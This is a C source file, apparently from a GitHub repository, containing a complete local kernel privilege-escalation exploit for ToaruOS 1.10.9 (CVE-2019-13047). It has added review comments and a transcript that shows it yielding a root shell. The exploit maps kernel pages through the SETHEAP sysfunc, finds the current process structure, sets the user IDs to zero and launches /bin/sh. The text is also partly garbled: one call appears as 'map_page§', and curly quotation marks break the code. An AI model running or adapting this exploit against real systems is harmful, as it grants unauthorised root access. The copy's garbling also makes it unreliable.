
CVE-2019-13047: kowasuos/kowasu-sysfunc.c at master · mehsauce/kowasuos

kernel/sys/syscall.c in ToaruOS through 1.10.9 has incorrect access control in sys_sysfunc case 9 for TOARU_SYS_FUNC_SETHEAP, allowing arbitrary kernel pages to be mapped into user land, leading to root access.


/*
 * The Mickey Mouse Hacking Squadron proudly presents
 *
 * CVE-2019-13047
 *
 * ToaruOS 1.10.9 sysfunc local kernel exploit
 *
 * (ASCII art as rendered on the page; the original spacing is lost)
 * .-“"”-.
 * / . - \
 * \ /
 * .-“”-.,:.-_-.<
 * / _; , / ).|
 * \ ; / ` `" '\
 * '.-| ;-.____, | .,
 * \ `._~_/ / /"/
 * ,. /`-.__.-‘\`-._ ,",’ ;
 * \"\ / /| o \._ `-._; / ./-.
 * ; ‘;, / / | `__ \ `-.,( / //.-'
 * :\ \\;_.-" ; |.-"` ``\ /-. /.-'
 * :\ .\),.-' / }{ | ‘…’
 * \ .-\ | , /
 * ‘…’ ;’ , /
 * ( __ `;–;’__`)
 * `//’` `||`
 * _// ||
 * .-"-._,(__) .(__).-“”-.
 * / \ / \
 * \ / \ /
 * `’–=="–` `–""==–’`
 *
 * Usage transcript from the original author:
 *
 * local@livecd ~$ gcc -Wall kowasu-sysfunc.c -o kowasu-sysfunc
 * local@livecd ~$ whoami
 * local
 * local@livecd ~$ ./kowasu-sysfunc
 * [ ] Scanning for ‘current_process’ symbol…
 *     symbol: 00122804
 *     current_process: 0184a010
 * [ ] Sanity checking ‘process_t’ structure…
 *     getpid(): 206
 *     current_process->id: 206
 * [ ] Spawning self-righteous root shell…
 * 0@livecd /home/local# whoami
 * root
 */
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/sysfunc.h>

/*
 * Window of kernel addresses scanned, one 4 KiB page at a time, for the
 * kernel's symbol table: 1 MiB to 2 MiB. The transcript above reports the
 * symbol at 0x00122804, inside this window; presumably this is where the
 * ToaruOS kernel image is loaded on the target build -- confirm against the
 * kernel's link map before relying on it.
 */
#define KERNEL_SCAN_START (1024U * 1024U)
#define KERNEL_SCAN_END (1024U * 2048U)

/*
 * Partial process structure specifying the members we need.
 *
 * Only the leading members of the kernel's process_t are mirrored, and their
 * order and widths must match the target kernel build exactly: the PID
 * comparison in main() is the only check that this layout assumption holds.
 */
struct process {
    pid_t id;
    char * name;
    char * description;
    unsigned int user;
    unsigned int real_user;
};

/*
 * Find the first occurrence of `needle` (needlelen bytes) inside `haystack`
 * (haystacklen bytes), comparing raw bytes.
 *
 * Returns a pointer into `haystack` at the match, or NULL if there is none.
 *
 * Defined locally rather than taken from libc; if the target libc also
 * exports memmem() this definition will clash with or shadow it -- verify
 * against the ToaruOS headers.
 *
 * NOTE(review): there is no guard for needlelen > haystacklen; in that case
 * `haystacklen - needlelen` wraps (both are size_t) and `end` is computed
 * from an out-of-range pointer, which is undefined behaviour. The single
 * caller in main() passes 4096 and 16, so the case does not arise here.
 */
void *memmem(const void *haystack, size_t haystacklen, const void *needle, size_t needlelen)
{
    const unsigned char *p = haystack;
    /* One past the last position at which a full needle can still fit. */
    const unsigned char *end = p + haystacklen - needlelen + 1;

    for (; p < end; p++) {
        size_t i;
        for (i = 0; i < needlelen; i++)
            if (p[i] != ((unsigned char *)needle)[i])
                break;
        /* The inner loop ran to completion only on a full match. */
        if (i == needlelen)
            return (void *)p;
    }
    return NULL;
}

/*
 * Make the kernel page containing `address` accessible from this process by
 * abusing the TOARU_SYS_FUNC_SETHEAP sysfunc (CVE-2019-13047).
 *
 * Per the advisory text on this page, the kernel accepts the caller-supplied
 * heap address without checking that it lies in user space, so pointing the
 * process heap at a kernel address causes the kernel to map that page into
 * user land. The heap is then moved back to its original break so that
 * libc's malloc() keeps operating on real user memory.
 *
 * Defender's note: the kernel-side fix is to reject heap addresses outside
 * the user address range before mapping anything -- presumably what the
 * upstream patch does; confirm against kernel/sys/syscall.c.
 *
 * Exits the process on failure. The second failure path uses _exit() so that
 * no library call can touch a heap that may now point at kernel memory.
 */
void map_page(void *address)
{
    /* sysfunc() takes its arguments as an array of pointers; slot 0 is the
     * requested heap address. */
    char *args[] = { address };
    /* NOTE(review): this local shadows the brk() function declared in
     * <unistd.h>; -Wshadow would flag it. It is static so that only the
     * first call samples the original break. */
    static void *brk = NULL;

    /* Keep track of the original break, as we need to restore
     * proc->image.heap and proc->image.heap_actual to ensure malloc()
     * will not use sbrk() and serve kernel pages back to libc.
     *
     * sbrk() returns the break as it was before the call, i.e. the original
     * one; the 4096-byte extension it requests is presumably undone by the
     * restore below -- TODO confirm.
     */
    if (brk == NULL)
        brk = sbrk(4096);

    /* Move the heap to the kernel address: this is the vulnerable call. */
    if (sysfunc(TOARU_SYS_FUNC_SETHEAP, args) < 0) {
        perror(“sysfunc()");
        exit(EXIT_FAILURE);
    }

    /* Restore the original break. */
    args[0] = brk;
    if (sysfunc(TOARU_SYS_FUNC_SETHEAP, args) < 0) {
        /* If we fail, do not print, as it could malloc(). */
        _exit(EXIT_FAILURE);
    }
}

/*
 * Replace the current process image with /bin/sh, which inherits the
 * credentials main() has just rewritten in the kernel's process record.
 * argv is {"sh", NULL} and envp is NULL (empty environment). execve() only
 * returns on failure, in which case the error is reported and the process
 * exits.
 */
void spawn_shell(void)
{
    char * const arg[2] = { “sh", NULL };

    execve(“/bin/sh", arg, NULL);
    perror(“execve()");
    exit(EXIT_FAILURE);
}

/*
 * Entry point. Steps, mirroring the transcript in the file header:
 *   1. map each page of the kernel scan window and search it for the string
 *      "current_process" (the symbol's name);
 *   2. read the pointer stored just before the name -- presumably the
 *      symbol's address in the kernel symbol table -- and map that page;
 *   3. dereference it to reach the current process_t, sanity-check its PID
 *      against getpid(), then clear both user-ID members and exec a shell.
 *
 * Exits with EXIT_FAILURE when the symbol is not found or the PID check
 * fails; on success it does not return (execve() in spawn_shell()).
 */
int main(void)
{
    struct process *current_process;
    uintptr_t addr;
    pid_t pid;

    pid = getpid();
    printf("[ ] Scanning for ‘current_process’ symbol…\n”);
    for (addr = KERNEL_SCAN_START; addr < KERNEL_SCAN_END; addr += 4096) {
        void *p = (void *)addr;
        /* NOTE(review): the page renders this call as "map_page§"; from the
         * surrounding code it is evidently the call that maps page p. */
        map_page§;
        /* 16 bytes: the 15-character name plus its NUL terminator, so only
         * the complete, terminated symbol name matches. Each page is searched
         * on its own, so a name straddling a page boundary would be missed. */
        if ( (p = memmem(p, 4096, “current_process", 16))) {
            /* NOTE(review): reads the pointer-sized word immediately before
             * the name; this assumes a symbol-table layout of address followed
             * by name -- confirm against the kernel. If the match sits at
             * offset 0 of the page this reads from the preceding page. */
            current_process = *((void **)p - 1);
            break;
        }
    }
    /* The loop only ends with addr < KERNEL_SCAN_END via the break above, so
     * this doubles as the "found" check and keeps current_process from being
     * read uninitialised. */
    if (addr >= KERNEL_SCAN_END) {
        printf(" not found…\n”);
        exit(EXIT_FAILURE);
    }
    printf(" symbol: %p\n", current_process);

    /* current_process here is the address of the kernel variable; map its
     * page and load the pointer it holds, which is the process_t itself. */
    map_page(current_process);
    current_process = *((void **)current_process);
    printf(" current_process: %p\n", current_process);

    /* NOTE(review): the page holding the process_t is not explicitly mapped
     * before the reads and writes below; presumably the SETHEAP call covers
     * a range rather than a single page, or the structure is already
     * reachable -- confirm against the kernel. */
    printf("[ ] Sanity checking ‘process_t’ structure…\n”);
    printf(" getpid(): %d\n", pid);
    printf(" current_process->id: %d\n", current_process->id);
    if (pid != current_process->id) {
        /* Layout or symbol mismatch: bail out rather than write to a
         * structure whose layout is not the one assumed above. */
        printf(" mismatching PID, exiting…\n”);
        exit(EXIT_FAILURE);
    }

    printf("[ ] Spawning self-righteous root shell…\n”);
    /* Zero both user-ID members of the kernel's own record of this process
     * (the transcript shows the resulting shell running as root), then exec
     * a shell that inherits them. */
    current_process->user = 0;
    current_process->real_user = 0;
    spawn_shell();
}
